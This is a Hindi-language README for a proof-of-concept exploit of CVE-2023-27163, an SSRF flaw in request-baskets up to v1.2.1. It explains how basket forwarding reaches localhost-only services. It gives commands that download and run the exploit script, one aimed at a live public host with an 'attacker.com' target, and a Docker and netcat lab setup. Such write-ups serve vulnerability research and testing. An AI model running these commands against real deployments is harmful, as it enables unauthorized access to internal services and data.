
Proof-of-Concept के लिए Server Side Request Forgery (SSRF) में request-baskets (<= v.1.2.1)
इस रिपॉजिटरी में CVE-2023-27163 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है, जो request-baskets में संस्करण 1.2.1 तक पाई गई एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमजोरी है। यह कमजोरी हमलावरों को एक क्राफ्टेड API अनुरोध के माध्यम से /api/baskets/{name} घटक का शोषण करके नेटवर्क संसाधनों और संवेदनशील जानकारी तक पहुंचने की अनुमति देती है।
श्रेय @b33t1e, @chelinboo147 और @houqinsheng को (देखें लेख)।
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/
Request-baskets एक वेब एप्लिकेशन है जो एक विशिष्ट मार्ग पर अनुरोधों को एकत्र और पंजीकृत करने के लिए बनाया गया है, जिसे बास्केट कहा जाता है। इसे बनाते समय, उपयोगकर्ता अनुरोध को अग्रेषित करने के लिए किसी अन्य सर्वर को निर्दिष्ट कर सकता है। यहां समस्या यह है कि उपयोगकर्ता अनपेक्षित सेवाओं, जैसे नेटवर्क-बंद एप्लिकेशन, को निर्दिष्ट कर सकता है।
उदाहरण के लिए: मान लीजिए कि सर्वर Request-baskets (पोर्ट 55555) और पोर्ट 8000 पर एक Flask वेब सर्वर होस्ट करता है। Flask केवल localhost के साथ इंटरैक्ट करने के लिए कॉन्फ़िगर किया गया है। http://localhost:8000 पर अग्रेषित करने वाली एक बास्केट बनाकर, हमलावर पहले से प्रतिबंधित Flask वेब सर्वर तक पहुंच सकता है।

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
यह परियोजना Unlicense के अंतर्गत है।